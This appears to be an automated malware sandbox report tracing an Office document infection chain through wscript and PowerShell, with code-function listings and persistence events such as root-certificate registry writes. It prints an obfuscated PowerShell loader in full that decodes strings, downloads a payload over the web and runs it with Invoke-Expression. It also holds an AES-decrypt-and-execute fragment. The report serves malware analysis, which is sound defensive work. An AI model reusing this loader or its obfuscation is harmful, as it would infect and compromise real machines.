4UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CB50
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00535040 push ecx; iretd 2_2_00535041
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00535060 push ebp; iretd 2_2_00535061
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00539EA1 push esi; iretd 2_2_00539EA2
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00538F51 push eax; retf 2_2_00538F61
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0053C77C pushfd ; ret 2_2_0053C77D
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00540F65 push eax; retn 0053h2_2_00540F79
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005473DC push ecx; ret 2_2_005473DF
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005301F4 push eax; retf 2_2_005301F5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_002525C1 push ebx; retf 6_2_002525EA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00457106 push ecx; ret 8_2_00457119
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0045B11A push esp; ret 8_2_0045B141
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0045E54D push esi; ret 8_2_0045E556
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00457A28 push eax; ret 8_2_00457A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00434E56 push ecx; ret 8_2_00434E69
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_10002806 push ecx; ret 8_2_10002819
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044693D push ecx; ret 12_2_0044694D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044DB70 push eax; ret 12_2_0044DB84
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044DB70 push eax; ret 12_2_0044DBAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00451D54 push eax; ret 12_2_00451D61
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00451D34 push eax; ret 14_2_00451D41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00444E71 push ecx; ret 14_2_00444E81
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00414060 push eax; ret 15_2_00414074
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00414060 push eax; ret 15_2_0041409C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00414039 push ecx; ret 15_2_00414049
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004164EB push 0000006Ah; retf 15_2_004165C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00416553 push 0000006Ah; retf 15_2_004165C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00416555 push 0000006Ah; retf 15_2_004165C4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00304A60 push eax; iretd 16_2_00304A29
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00302DC8 push ebx; ret 16_2_00302DEA

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00406EB0 ShellExecuteW,URLDownloadToFileW,8_2_00406EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_0041AA4A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CB50
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
